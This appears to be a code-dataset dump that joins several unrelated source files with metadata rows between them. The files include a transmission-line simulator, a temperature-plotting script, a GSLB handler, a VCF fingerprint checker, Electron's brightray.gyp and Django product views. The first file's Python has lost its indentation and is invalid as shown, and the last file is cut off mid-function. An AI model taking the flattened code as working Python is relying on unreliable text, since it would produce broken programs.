# Transmission Line Simulator
#
# Author(s): Jiacong Xu
# Created: Jul-3-2017
#
from circuitelement import CircuitElement
from powersource import PowerSource
from resistor import Resistor
from oscilloscope import Oscilloscope
from util.constants import *
from wire import Wire
class Circuit(object):
"""
An instance that describes exactly how the circuit is set up. A circuit
consists of a list of resistors connected in series or in parallel.
head: the first element of the circuit. This is a linked list.
"""
def __init__(self):
"""
Initializes a brand new circuit with a power source, single cable and a
single load at the right.
"""
source = PowerSource(10.0, 5.0, 1)
cable = Wire(5.0, 1)
load = Resistor(0.0)
cable.length = 5.0
source.next = cable
cable.next = load
self.head = source
self.headOscilloscope = None
def getLength(self):
"""
Calculates and returns the length going from the power source to the
load on the right, in meters.
"""
p = 0
e = self.head
while e != None:
p = e.position
e = e.next
return p
def insertOscilloscope(self, pos):
"""
Inserts a new oscilloscope at given circuit position. Returns the
inserted item.
"""
pos = max(0, min(self.getLength(), pos))
o = Oscilloscope()
o.position = pos
self._insert(o)
return o
def splitWire(self, e, pos):
c = Wire(e.impedance, e.speed)
c.length = e.length - pos
c.next = e.next
e.length = pos
e.next = c
# Now reset oscilloscopes' wire properties.
o = self.headOscilloscope
while o != None:
if e.position <= o.position and e.position + e.length >= o.position:
o.wire = e
elif c.position <= o.position and c.position + c.length >= o.position:
o.wire = c
o = o.next
def deleteWire(self, element):
element.prev.next = element.next
# Delete any oscilloscopes on this segment, and also changes positioning
# for later oscilloscopes.
h = self.headOscilloscope
while h != None:
if h.position > element.position:
if h.position < element.position + element.length:
# Delete oscilloscope.
if h.prev != None:
h.prev.next = h.next
if h.next != None:
h.next.prev = h.prev
if h == self.headOscilloscope:
self.headOscilloscope = h.next
else:
# Move oscilloscope.
h.position -= element.length
h = h.next
def moveOscilloscope(self, element, pos):
"""
Moves the given oscilloscope to somewhere else.
"""
element.position = pos
# First detach
if element.prev != None:
element.prev.next = element.next
if element.next != None:
element.next.prev = element.prev
if self.headOscilloscope == element:
self.headOscilloscope = element.next
# Now reinsert
self._insert(element)
def checkOscilloscopes(self):
# Checks and removes out of bound osclloscopes.
o = self.headOscilloscope
l = self.getLength()
while o != None:
if o.position > l:
if o.prev != None:
o.prev.next = None
elif o == self.headOscilloscope:
self.headOscilloscope = None
o = o.next
def _insert(self, o):
# First determine wire
e = self.head.next
while e.next != None:
if e.position <= o.position and e.position + e.length >= o.position:
break
e = e.next
o.wire = e
# Now insert into linked list.
if self.headOscilloscope == None:
self.headOscilloscope = o
return
h = self.headOscilloscope
while h != None:
if h.position > o.position:
if h.prev != None:
h.prev.next = o
else:
self.headOscilloscope = o
o.prev = h.prev
h.prev = o
o.next = h
return
elif h.next == None:
h.next = o
o.prev = h
break
h = h.next
def getElements(self, position, isForward):
"""
Returns the circuit elements positioned at the given position.
position: the discretized position along the circuit, in meters.
isForward: whether we are looking for junctions of elements going
forward.
"""
es = []
e = self.head
step = self.getLength() / DISCRETE_STEPS
while e != None:
if isForward:
if position <= e.position and e.position < position + step:
es.append(e)
else:
if position >= e.position + e.length and e.position > position + e.length - step:
es.append(e)
e = e.next
if not isForward:
es.reverse()
return es
def reset(self):
e = self.head
while e != None:
e.reset()
e = e.next
e = self.headOscilloscope
while e != None:
e.reset()
e = e.next
| 25.432314 | 97 | 0.504293 |
77e62efaeab063a77fc142dab0ba15248b847f42 | 3,280 | py | Python | plot_sensor_csv.py | weightedEights/plot_sensor_csv | d84efec649464af409ef9f8a8c635aa06e00f449 | [
"MIT"
] | null | null | null | plot_sensor_csv.py | weightedEights/plot_sensor_csv | d84efec649464af409ef9f8a8c635aa06e00f449 | [
"MIT"
] | null | null | null | plot_sensor_csv.py | weightedEights/plot_sensor_csv | d84efec649464af409ef9f8a8c635aa06e00f449 | [
"MIT"
] | null | null | null | import os
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.style as pltstyle
from bokeh.plotting import figure, output_file, show
from bokeh.models import HoverTool
from bokeh.themes import built_in_themes
from bokeh.io import curdoc
dat_files_to_plot = ["temps_20190817.txt"]
def main():
# get data to plot
dat_list_to_plt = get_dat_to_plot(dat_files_to_plot)
# create pandas df time series
dat_df = df_from_dat_list(dat_list_to_plt)
print(dat_df.head())
# plot using pandas built-in
# maybe in future use bokeh
# pandas_plot(dat_df)
bokeh_plot(dat_df)
def get_dat_to_plot(file_list):
dat_list_paths = []
for file in file_list:
dat_list_paths.append(os.path.join("./data", file))
return dat_list_paths
def df_from_dat_list(dat_list):
# parse dates and use as index
dat_df = pd.read_csv(dat_list[0], parse_dates=True, index_col=0)
dat_df.rename_axis("date", axis="index", inplace=True)
dat_df.columns = ["temp_top", "temp_bottom"]
return dat_df
def pandas_plot(df):
plt.interactive(True)
# pltstyle.use('Solarize_Light2')
pltstyle.use('fivethirtyeight')
# pltstyle.use('ggplot')
# df["Temp_A"].plot(style='r-', linewidth=1.0, label="Top Shelf Temp")
# df["Temp_B"].plot(style='b-', linewidth=1.0, label="Bottom Shelf Temp")
ax = df.plot(style=['r-', 'b-'])
ax.legend(["Top Shelf Temp", "Bottom Shelf Temp"])
# get index of max value from Temp_A to annotate
# i_max_val = df.index.get_loc(df["Temp_A"]["2019-06-25 07":"2019-06-25 08"].idxmax())
# ax.annotate("Sleep system egress,\nurine bottle fill.",
# (df.index[i_max_val], df["Temp_A"][i_max_val]),
# xytext=(-240, 10),
# textcoords='offset points',
# arrowprops=dict(arrowstyle='-|>', lw=3, ec='r'))
# ax.grid(which='major', linestyle='-', linewidth='0.5')
# ax.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.title("Interior Temps, Orange Fish Hut #1")
plt.ylabel("Temp [$\degree$C]")
plt.xlabel("Date Time [UTC]")
plt.show(block=True)
def bokeh_plot(df):
# filtered_df = df[(df["temp_bottom"] > -25) & (df["temp_bottom"] < 20)]
output_file("interior_temps.html")
curdoc().theme = "caliber"
# curdoc().theme = "dark_minimal"
# curdoc().theme = "light_minimal"
solarized_red = "#dc322f"
solarized_blue = "#268bd2"
solarized_green = "#859900"
solarized_cyan = "#2aa198"
hover = HoverTool(
tooltips=[
("date", "@x{%Y-%m-%d %H:%M:%S}"),
("temp", "$y")
],
formatters={
"x": "datetime"
}
)
tools = [hover, 'box_zoom', 'save', 'reset']
p = figure(x_axis_type="datetime", plot_width=1600, plot_height=900, tools=tools)
p.line(x=df.index, y=df.iloc[:, 0], legend="Top Shelf Temp", line_width=2, color=solarized_red)
p.line(x=df.index, y=df.iloc[:, 1], legend="Bottom Shelf Temp", line_width=2, color=solarized_blue)
p.title.text = "Interior Temps, Orange Fish Hut #1"
p.yaxis.axis_label = "Temp [\N{DEGREE SIGN}C]"
p.xaxis.axis_label = "Date Time [UTC]"
show(p)
if __name__ == '__main__':
main()
| 27.333333 | 103 | 0.630488 |
963a8c2a461630b959b31ef091946a011cc71411 | 586 | py | Python | src/powergslb/server/http/handler/abstract.py | fyanuar/powergslb | 7dae75fd89017ef77385d15fde8c931b8436db92 | [
"MIT"
] | 81 | 2016-01-21T12:02:39.000Z | 2022-02-11T13:07:07.000Z | src/powergslb/server/http/handler/abstract.py | fyanuar/powergslb | 7dae75fd89017ef77385d15fde8c931b8436db92 | [
"MIT"
] | 24 | 2017-03-05T00:12:49.000Z | 2022-01-18T12:34:32.000Z | src/powergslb/server/http/handler/abstract.py | fyanuar/powergslb | 7dae75fd89017ef77385d15fde8c931b8436db92 | [
"MIT"
] | 28 | 2017-04-28T17:16:29.000Z | 2022-02-16T04:49:23.000Z | import abc
__all__ = ['AbstractContentHandler']
class AbstractContentHandler(object):
"""
AbstractContentHandler class
"""
__metaclass__ = abc.ABCMeta
def __init__(self, request_handler):
self.body = request_handler.body
self.database = request_handler.database
self.dirs = request_handler.dirs
self.headers = request_handler.headers
self.path = request_handler.path
self.remote_ip = request_handler.remote_ip
self.query = request_handler.query
@abc.abstractmethod
def content(self):
pass
| 24.416667 | 50 | 0.6843 |
6198a3840b6e88f01c5e65bfeea62ad9db522569 | 3,919 | py | Python | assets/check_fingerprint_vcf.py | UMCUGenetics/DxNextflowMIP | ab4c3d006d38577a020ad848224f8ab208e83d79 | [
"MIT"
] | null | null | null | assets/check_fingerprint_vcf.py | UMCUGenetics/DxNextflowMIP | ab4c3d006d38577a020ad848224f8ab208e83d79 | [
"MIT"
] | null | null | null | assets/check_fingerprint_vcf.py | UMCUGenetics/DxNextflowMIP | ab4c3d006d38577a020ad848224f8ab208e83d79 | [
"MIT"
] | null | null | null | import argparse
import os
import shutil
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Check fingerprint vcf files.')
parser.add_argument('fingerprint_vcf_files', type=argparse.FileType('r'), nargs='*', help='Fingerprint VCF')
arguments = parser.parse_args()
disapproved_folder = 'disapprovedVCFs'
approved_folder = 'approvedVCFs'
os.mkdir(disapproved_folder)
os.mkdir(approved_folder)
gender = ['M', 'F', 'O']
logbook = []
for vcf_file in arguments.fingerprint_vcf_files:
refcov = 0 # Total reference reads for all homozygous (1/1) calls
totalcov = 0 # Total coverage for all homozygous calls
homaltcount = 0 # Number of homozygous calls
ycount = 0 # Sum of coverage for two Y SNPs
lowcovcount = 0 # Number of SNPs with <15X coverage
disbalancecount = 0 # Number of heterozygous (0/1) calls with allelefrequency <0.2 or >0.8
for line in vcf_file:
if not line.startswith('#'):
line = line.split()
# Parse Genotype format
gt_format = line[8].split(':')
gt_index = gt_format.index('GT')
# Parse sample genotype
gt_values = line[9].split(':')
gt_value = gt_values[gt_index]
if line[0] == 'Y':
if gt_value != './.':
ycount += int(gt_values[gt_format.index('DP')])
elif gt_value == '1/1':
homaltcount += 1
if int(gt_values[gt_format.index('DP')]) < 15:
lowcovcount += 1
refcov += int(gt_values[gt_format.index('AD')].split(',')[0])
totalcov += int(gt_values[gt_format.index('DP')])
elif gt_value != '1/1':
if gt_value == './.':
lowcovcount += 1
elif gt_value == '0/0':
if int(gt_values[gt_format.index('DP')]) < 15:
lowcovcount += 1
else:
if int(gt_values[gt_format.index('DP')]) < 15:
lowcovcount += 1
if gt_value == '0/1':
af_value = int(gt_values[gt_format.index('AD')].split(',')[0]) / float(int(gt_values[gt_format.index('DP')]))
if af_value > 0.8 or af_value < 0.2:
disbalancecount += 1
contamination = refcov / float(totalcov)
result = vcf_file.name, str(lowcovcount), str(homaltcount), str(round(contamination, 6)), vcf_file.name[8], str(ycount), str(disbalancecount)
logbook.append(result)
if result[4] not in gender:
print('### {}: report filename issue to lab'.format(vcf_file.name))
if int(result[1]) > 15:
print('### {}: >15 SNPs with <15X coverage ({}) --> disapproved'.format(vcf_file.name, result[1]))
shutil.move(vcf_file.name, disapproved_folder)
elif int(result[6]) > 8:
print('### {}: >8 heterozygous SNPs with <20% MAF ({}) --> disapproved'.format(vcf_file.name, result[6]))
shutil.move(vcf_file.name, disapproved_folder)
elif int(result[2]) < 8:
print('### {}: <8 homozygous ALT SNPs called ({}) --> disapproved'.format(vcf_file.name, result[2]))
shutil.move(vcf_file.name, disapproved_folder)
elif result[4] == 'F' and int(result[5]) > 100 or result[4] == 'M' and int(result[5]) < 100:
print('### {}: gender {} with {} reads on chromosome Y, discuss with lab and disapprove if needed'.format(vcf_file.name, result[4], result[5]))
shutil.move(vcf_file.name, approved_folder)
else:
shutil.move(vcf_file.name, approved_folder)
for line in logbook:
print '\t'.join(line)
| 45.045977 | 155 | 0.546313 |
312255cffc122fbff5083163ad6414b714bca7f3 | 20,066 | gyp | Python | brightray/brightray.gyp | frantic/electron | 4ebe71655b1575f985ddde5760f8f5cde8f03f0d | [
"MIT"
] | 2 | 2018-06-23T22:04:12.000Z | 2018-06-28T08:59:52.000Z | brightray/brightray.gyp | frantic/electron | 4ebe71655b1575f985ddde5760f8f5cde8f03f0d | [
"MIT"
] | null | null | null | brightray/brightray.gyp | frantic/electron | 4ebe71655b1575f985ddde5760f8f5cde8f03f0d | [
"MIT"
] | 1 | 2018-10-05T17:29:23.000Z | 2018-10-05T17:29:23.000Z | {
'variables': {
# The libraries brightray will be compiled to.
'linux_system_libraries': 'gtk+-3.0 atk-bridge-2.0 dbus-1 x11 x11-xcb xcb xi xcursor xdamage xrandr xcomposite xext xfixes xrender xtst xscrnsaver gconf-2.0 gmodule-2.0 nss',
'conditions': [
['target_arch=="mips64el"', {
'linux_system_libraries': '<(linux_system_libraries) libpulse',
}],
],
},
'includes': [
'filenames.gypi',
],
'targets': [
{
'target_name': 'brightray',
'type': 'static_library',
'include_dirs': [
'..',
'<(libchromiumcontent_src_dir)',
'<(libchromiumcontent_src_dir)/skia/config',
'<(libchromiumcontent_src_dir)/third_party/boringssl/src/include',
'<(libchromiumcontent_src_dir)/third_party/skia/include/core',
'<(libchromiumcontent_src_dir)/third_party/skia/include/gpu',
'<(libchromiumcontent_src_dir)/third_party/mojo/src',
'<(libchromiumcontent_src_dir)/third_party/WebKit',
'<(libchromiumcontent_src_dir)/third_party/khronos',
'<(libchromiumcontent_src_dir)/third_party/protobuf/src',
'<(libchromiumcontent_dir)/gen',
],
'direct_dependent_settings': {
'include_dirs': [
'../vendor',
'<(libchromiumcontent_src_dir)',
'<(libchromiumcontent_src_dir)/gpu',
'<(libchromiumcontent_src_dir)/skia/config',
'<(libchromiumcontent_src_dir)/third_party/boringssl/src/include',
'<(libchromiumcontent_src_dir)/third_party/skia/include/core',
'<(libchromiumcontent_src_dir)/third_party/skia/include/gpu',
'<(libchromiumcontent_src_dir)/third_party/skia/include/config',
'<(libchromiumcontent_src_dir)/third_party/icu/source/common',
'<(libchromiumcontent_src_dir)/third_party/mojo/src',
'<(libchromiumcontent_src_dir)/third_party/khronos',
'<(libchromiumcontent_src_dir)/third_party/WebKit',
'<(libchromiumcontent_dir)/gen',
'<(libchromiumcontent_dir)/gen/third_party/WebKit',
],
},
'defines': [
# See Chromium's "src/third_party/protobuf/BUILD.gn".
'GOOGLE_PROTOBUF_NO_RTTI',
'GOOGLE_PROTOBUF_NO_STATIC_INITIALIZER',
],
'sources': [ '<@(brightray_sources)' ],
'conditions': [
# Link with libraries of libchromiumcontent.
['OS=="linux" and libchromiumcontent_component==0', {
# On Linux we have to use "--whole-archive" to force executable
# to include all symbols, otherwise we will have plenty of
# unresolved symbols errors.
'direct_dependent_settings': {
'ldflags': [
'-Wl,--whole-archive',
'<@(libchromiumcontent_libraries)',
'-Wl,--no-whole-archive',
],
}
}, { # (Release build on Linux)
'link_settings': {
'libraries': [ '<@(libchromiumcontent_libraries)' ]
},
}], # (Normal builds)
# Linux specific link settings.
['OS=="linux"', {
'link_settings': {
'ldflags': [
'<!@(<(pkg-config) --libs-only-L --libs-only-other <(linux_system_libraries))',
],
'libraries': [
'-lpthread',
'-latomic',
'<!@(<(pkg-config) --libs-only-l <(linux_system_libraries))',
],
},
'cflags': [
'<!@(<(pkg-config) --cflags <(linux_system_libraries))',
],
'direct_dependent_settings': {
'cflags': [
'<!@(<(pkg-config) --cflags <(linux_system_libraries))',
],
},
'conditions': [
['clang==1', {
'cflags_cc': [
'-Wno-reserved-user-defined-literal',
],
'cflags': [
# Needed by using libgtkui:
'-Wno-deprecated-register',
'-Wno-sentinel',
],
'direct_dependent_settings': {
'cflags': [
'-Wno-deprecated-register',
'-Wno-sentinel',
],
},
}],
['libchromiumcontent_component', {
'link_settings': {
'libraries': [
# Following libraries are always linked statically.
'<(libchromiumcontent_dir)/libgtkui.a',
'<(libchromiumcontent_dir)/libhttp_server.a',
'<(libchromiumcontent_dir)/libdevice_service.a',
'<(libchromiumcontent_dir)/libdom_keycode_converter.a',
'<(libchromiumcontent_dir)/libsystem_wrappers.a',
'<(libchromiumcontent_dir)/librtc_base.a',
'<(libchromiumcontent_dir)/librtc_base_generic.a',
'<(libchromiumcontent_dir)/libwebrtc_common.a',
'<(libchromiumcontent_dir)/libinit_webrtc.a',
'<(libchromiumcontent_dir)/libyuv.a',
'<(libchromiumcontent_dir)/librenderer.a',
'<(libchromiumcontent_dir)/libsecurity_state.a',
'<(libchromiumcontent_dir)/libviz_service.a',
# services/device/wake_lock/power_save_blocker/
'<(libchromiumcontent_dir)/libpower_save_blocker.a',
# Friends of libpdf.a:
# On Linux we have to use "--whole-archive" to include
# all symbols, otherwise there will be plenty of
# unresolved symbols errors.
'-Wl,--whole-archive',
'<(libchromiumcontent_dir)/libpdf.a',
'<(libchromiumcontent_dir)/libppapi_cpp_objects.a',
'<(libchromiumcontent_dir)/libppapi_internal_module.a',
'<(libchromiumcontent_dir)/libpdfium.a',
'<(libchromiumcontent_dir)/libpdfium_skia_shared.a',
'<(libchromiumcontent_dir)/libfdrm.a',
'<(libchromiumcontent_dir)/libformfiller.a',
'<(libchromiumcontent_dir)/libfpdfapi.a',
'<(libchromiumcontent_dir)/libfpdfdoc.a',
'<(libchromiumcontent_dir)/libfpdftext.a',
'<(libchromiumcontent_dir)/libfxcodec.a',
'<(libchromiumcontent_dir)/libfxge.a',
'<(libchromiumcontent_dir)/libfxjs.a',
'<(libchromiumcontent_dir)/libpwl.a',
'<(libchromiumcontent_dir)/libfx_agg.a',
'<(libchromiumcontent_dir)/libfx_lcms2.a',
'<(libchromiumcontent_dir)/libfx_libopenjpeg.a',
'<(libchromiumcontent_dir)/libfx_zlib.a',
'-Wl,--no-whole-archive',
],
},
}, {
'link_settings': {
'libraries': [
# Link with ffmpeg.
'<(libchromiumcontent_dir)/libffmpeg.so',
# Following libraries are required by libchromiumcontent:
'-lasound',
'-lcap',
'-lcups',
'-lrt',
'-ldl',
'-lresolv',
'-lfontconfig',
'-lexpat',
],
},
}],
# This lib does not exist on arm.
['target_arch=="arm"', {
'link_settings': {
'libraries!': [
'<(libchromiumcontent_dir)/libdesktop_capture_differ_sse2.a',
],
},
}],
# Due to strange linker behavior, component build of arm needs to
# be linked with libjpeg.a explicitly.
['target_arch=="arm" and libchromiumcontent_component==1', {
'link_settings': {
'libraries': [
'<(libchromiumcontent_dir)/libjpeg.a',
],
},
}],
],
}], # OS=="linux"
['OS=="mac"', {
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/AppKit.framework',
# Required by webrtc:
'$(SDKROOT)/System/Library/Frameworks/OpenGL.framework',
'$(SDKROOT)/System/Library/Frameworks/IOKit.framework',
# Required by media:
'$(SDKROOT)/System/Library/Frameworks/VideoToolbox.framework',
],
},
'conditions': [
['libchromiumcontent_component', {
'link_settings': {
'libraries': [
# Following libraries are always linked statically.
'<(libchromiumcontent_dir)/libhttp_server.a',
'<(libchromiumcontent_dir)/libdevice_service.a',
'<(libchromiumcontent_dir)/libdom_keycode_converter.a',
'<(libchromiumcontent_dir)/librtc_base.a',
'<(libchromiumcontent_dir)/librtc_base_generic.a',
'<(libchromiumcontent_dir)/libsystem_wrappers.a',
'<(libchromiumcontent_dir)/libwebrtc_common.a',
'<(libchromiumcontent_dir)/libinit_webrtc.a',
'<(libchromiumcontent_dir)/libyuv.a',
'<(libchromiumcontent_dir)/libpdfium_skia_shared.a',
'<(libchromiumcontent_dir)/librenderer.a',
'<(libchromiumcontent_dir)/libsecurity_state.a',
'<(libchromiumcontent_dir)/libviz_service.a',
# services/device/wake_lock/power_save_blocker/
'<(libchromiumcontent_dir)/libpower_save_blocker.a',
# Friends of libpdf.a:
'<(libchromiumcontent_dir)/libpdf.a',
'<(libchromiumcontent_dir)/libppapi_cpp_objects.a',
'<(libchromiumcontent_dir)/libppapi_internal_module.a',
'<(libchromiumcontent_dir)/libjpeg.a',
'<(libchromiumcontent_dir)/libpdfium.a',
'<(libchromiumcontent_dir)/libfdrm.a',
'<(libchromiumcontent_dir)/libformfiller.a',
'<(libchromiumcontent_dir)/libfpdfapi.a',
'<(libchromiumcontent_dir)/libfpdfdoc.a',
'<(libchromiumcontent_dir)/libfpdftext.a',
'<(libchromiumcontent_dir)/libfxcodec.a',
'<(libchromiumcontent_dir)/libfxcrt.a',
'<(libchromiumcontent_dir)/libfxge.a',
'<(libchromiumcontent_dir)/libfxjs.a',
'<(libchromiumcontent_dir)/libpwl.a',
'<(libchromiumcontent_dir)/libfx_agg.a',
'<(libchromiumcontent_dir)/libfx_lcms2.a',
'<(libchromiumcontent_dir)/libfx_libopenjpeg.a',
'<(libchromiumcontent_dir)/libfx_zlib.a',
],
},
}, {
'link_settings': {
'libraries': [
# Link with ffmpeg.
'<(libchromiumcontent_dir)/libffmpeg.dylib',
# Link with system frameworks.
# ui_base.gypi:
'$(SDKROOT)/System/Library/Frameworks/Accelerate.framework',
# net.gypi:
'$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
'$(SDKROOT)/System/Library/Frameworks/Security.framework',
'$(SDKROOT)/System/Library/Frameworks/SystemConfiguration.framework',
'-lresolv',
# media.gyp:
'$(SDKROOT)/System/Library/Frameworks/AudioToolbox.framework',
'$(SDKROOT)/System/Library/Frameworks/AudioUnit.framework',
'$(SDKROOT)/System/Library/Frameworks/AVFoundation.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreAudio.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreMedia.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreMIDI.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreVideo.framework',
# surface.gyp:
'$(SDKROOT)/System/Library/Frameworks/IOSurface.framework',
# content_common.gypi:
'$(SDKROOT)/System/Library/Frameworks/QuartzCore.framework',
# base.gyp:
'$(SDKROOT)/System/Library/Frameworks/ApplicationServices.framework',
'$(SDKROOT)/System/Library/Frameworks/Carbon.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreFoundation.framework',
# device/gamepad/BUILD.gn:
'$(SDKROOT)/System/Library/Frameworks/ForceFeedback.framework',
'$(SDKROOT)/System/Library/Frameworks/GameController.framework',
# content_browser.gypi:
'-lbsm',
# content_common.gypi:
'-lsandbox',
# bluetooth.gyp:
'$(SDKROOT)/System/Library/Frameworks/IOBluetooth.framework',
# components/wifi/BUILD.gn:
'$(SDKROOT)/System/Library/Frameworks/CoreWLAN.framework',
# printing/BUILD.gn:
'-lcups',
],
},
}],
]
}], # OS=="mac"
['OS=="win"', {
'link_settings': {
'msvs_settings': {
'VCLinkerTool': {
'AdditionalOptions': [
# warning /DELAYLOAD:dll ignored; no imports found from dll
'/ignore:4199',
],
'AdditionalDependencies': [
'delayimp.lib',
],
'DelayLoadDLLs': [
'wtsapi32.dll',
# content_common.gypi:
'd3d9.dll',
'd3d11.dll',
'dxva2.dll',
# media.gyp:
'mf.dll',
'mfplat.dll',
'mfreadwrite.dll',
# bluetooth.gyp:
'BluetoothApis.dll',
'Bthprops.cpl',
'setupapi.dll',
# base.gyp:
'cfgmgr32.dll',
'powrprof.dll',
'setupapi.dll',
# net_common.gypi:
'crypt32.dll',
'dhcpcsvc.dll',
'rpcrt4.dll',
'secur32.dll',
'urlmon.dll',
'winhttp.dll',
# windows runtime
'API-MS-WIN-CORE-WINRT-L1-1-0.DLL',
'API-MS-WIN-CORE-WINRT-STRING-L1-1-0.DLL',
],
},
},
},
'conditions': [
['libchromiumcontent_component', {
'link_settings': {
'libraries': [
# Needed by desktop_capture.lib:
'-ld3d11.lib',
'-ldxgi.lib',
# Following libs are always linked statically.
'<(libchromiumcontent_dir)/base_static.lib',
'<(libchromiumcontent_dir)/sandbox.lib',
'<(libchromiumcontent_dir)/sandbox_helper_win.lib',
'<(libchromiumcontent_dir)/http_server.lib',
'<(libchromiumcontent_dir)/device_service.lib',
'<(libchromiumcontent_dir)/dom_keycode_converter.lib',
'<(libchromiumcontent_dir)/rtc_base.lib',
'<(libchromiumcontent_dir)/rtc_base_generic.lib',
'<(libchromiumcontent_dir)/system_wrappers.lib',
'<(libchromiumcontent_dir)/webrtc_common.lib',
'<(libchromiumcontent_dir)/init_webrtc.lib',
'<(libchromiumcontent_dir)/libyuv.lib',
'<(libchromiumcontent_dir)/pdfium_skia_shared.lib',
'<(libchromiumcontent_dir)/renderer.lib',
'<(libchromiumcontent_dir)/security_state.lib',
'<(libchromiumcontent_dir)/viz_service.lib',
# services/device/wake_lock/power_save_blocker/
'<(libchromiumcontent_dir)/power_save_blocker.lib',
# Friends of pdf.lib:
'<(libchromiumcontent_dir)/pdf.lib',
'<(libchromiumcontent_dir)/ppapi_cpp_objects.lib',
'<(libchromiumcontent_dir)/ppapi_internal_module.lib',
'<(libchromiumcontent_dir)/libjpeg.lib',
'<(libchromiumcontent_dir)/pdfium.lib',
'<(libchromiumcontent_dir)/fdrm.lib',
'<(libchromiumcontent_dir)/formfiller.lib',
'<(libchromiumcontent_dir)/fpdfapi.lib',
'<(libchromiumcontent_dir)/fpdfdoc.lib',
'<(libchromiumcontent_dir)/fpdftext.lib',
'<(libchromiumcontent_dir)/fpdftext.lib',
'<(libchromiumcontent_dir)/fxcodec.lib',
'<(libchromiumcontent_dir)/fxcrt.lib',
'<(libchromiumcontent_dir)/fxge.lib',
'<(libchromiumcontent_dir)/fxjs.lib',
'<(libchromiumcontent_dir)/pwl.lib',
'<(libchromiumcontent_dir)/fx_agg.lib',
'<(libchromiumcontent_dir)/fx_lcms2.lib',
'<(libchromiumcontent_dir)/fx_libopenjpeg.lib',
'<(libchromiumcontent_dir)/fx_zlib.lib',
'<(libchromiumcontent_dir)/desktop_capture_generic.lib',
'<(libchromiumcontent_dir)/desktop_capture.lib',
],
},
}, {
# Link with system libraries.
'link_settings': {
'libraries': [
# Link with ffmpeg.
'<(libchromiumcontent_dir)/ffmpeg.dll',
# content_browser.gypi:
'-lsensorsapi.lib',
'-lportabledeviceguids.lib',
# content_common.gypi:
'-ld3d9.lib',
'-ld3d11.lib',
'-ldxgi.lib',
'-ldxva2.lib',
'-lstrmiids.lib',
'-lmf.lib',
'-lmfplat.lib',
'-lmfuuid.lib',
# media.gyp:
'-ldxguid.lib',
'-lmfreadwrite.lib',
'-lmfuuid.lib',
],
'msvs_settings': {
'VCLinkerTool': {
'AdditionalDependencies': [
'advapi32.lib',
'dbghelp.lib',
'dwmapi.lib',
'gdi32.lib',
'hid.lib',
'netapi32.lib',
'oleacc.lib',
'user32.lib',
'usp10.lib',
'version.lib',
'winspool.lib',
'wtsapi32.lib',
# bluetooth.gyp:
'Bthprops.lib',
'BluetoothApis.lib',
# base.gyp:
'cfgmgr32.lib',
'powrprof.lib',
'setupapi.lib',
# net_common.gypi:
'crypt32.lib',
'dhcpcsvc.lib',
'ncrypt.lib',
'rpcrt4.lib',
'secur32.lib',
'urlmon.lib',
'winhttp.lib',
# ui/gfx/BUILD.gn:
'dwrite.lib',
# skia/BUILD.gn:
'fontsub.lib',
],
},
},
},
}], # libchromiumcontent_component
],
}], # OS=="win"
],
},
],
}
| 44.295806 | 178 | 0.490531 |
1c95c05af99855151e97f19bd06dad4d38303553 | 409 | py | Python | rate_my_landlord/rate_my_landlord/asgi.py | Antsthebul/ratemylandlord | 729bd3307ebb3288df2d8173b10d41f57265bdae | [
"Apache-2.0"
] | 1 | 2021-10-10T00:21:15.000Z | 2021-10-10T00:21:15.000Z | rate_my_landlord/rate_my_landlord/asgi.py | Antsthebul/ratemylandlord | 729bd3307ebb3288df2d8173b10d41f57265bdae | [
"Apache-2.0"
] | 19 | 2021-10-04T05:01:05.000Z | 2021-12-06T23:39:00.000Z | rate_my_landlord/rate_my_landlord/asgi.py | Antsthebul/ratemylandlord | 729bd3307ebb3288df2d8173b10d41f57265bdae | [
"Apache-2.0"
] | 4 | 2021-11-28T15:34:36.000Z | 2021-12-03T23:56:59.000Z | """
ASGI config for rate_my_landlord project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'rate_my_landlord.settings')
application = get_asgi_application()
| 24.058824 | 78 | 0.794621 |
15950e6e93266782283cd21dcc0e6af671a1bde2 | 5,472 | py | Python | products/views.py | sakthipriya-07/BuildingConstructionMaterialsSupply | e4b32d97eb6e574e78b955a03a0717bc7b5d13d4 | [
"MIT"
] | null | null | null | products/views.py | sakthipriya-07/BuildingConstructionMaterialsSupply | e4b32d97eb6e574e78b955a03a0717bc7b5d13d4 | [
"MIT"
] | null | null | null | products/views.py | sakthipriya-07/BuildingConstructionMaterialsSupply | e4b32d97eb6e574e78b955a03a0717bc7b5d13d4 | [
"MIT"
] | null | null | null | from django.contrib.admin.views.decorators import staff_member_required
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from .filter import ProductFilter
from .models import Category, Product
from users.models import Customer, User
from orders.models import Order
from cart.forms import CartAddProductForm
from .forms import ProductForm, CategoryForm, RFQForm
def home(request):
if request.user.is_staff:
return redirect('products:employee_home')
elif request.user.username:
return redirect('products:product_list')
else:
return redirect('users:home')
def product_list(request, category_slug=None):
category = None
categories = Category.objects.all()
products = Product.objects.filter(available=True)
if category_slug:
category = get_object_or_404(Category, slug=category_slug)
products = products.filter(category=category)
productFilter = ProductFilter(request.GET, queryset=products)
products = productFilter.qs
return render(request,
'buildingsupply/list.html',
{'category': category,
'categories': categories,
'products': products,
'productFilter': productFilter})
def product_detail(request, id, slug):
product = get_object_or_404(Product,
id=id,
slug=slug,
available=True)
user = request.user
cart_product_form = CartAddProductForm()
return render(request,
'buildingsupply/detail.html',
{'product': product,
'cart_product_form': cart_product_form,
'user': user})
@staff_member_required
def product_new(request):
if request.method == "POST":
form = ProductForm(request.POST, request.FILES)
if form.is_valid():
product = form.save(commit=False)
product.save()
return redirect('products:product_list')
else:
form = ProductForm()
return render(request, 'buildingsupply/product_new.html', {'form': form})
@staff_member_required
def product_edit(request, pk):
product = get_object_or_404(Product, pk=pk)
if request.method == "POST":
form = ProductForm(request.POST, instance=product)
if form.is_valid():
product = form.save()
product.updated = timezone.now()
product.save()
return redirect('products:product_list')
else:
form = ProductForm(instance=product)
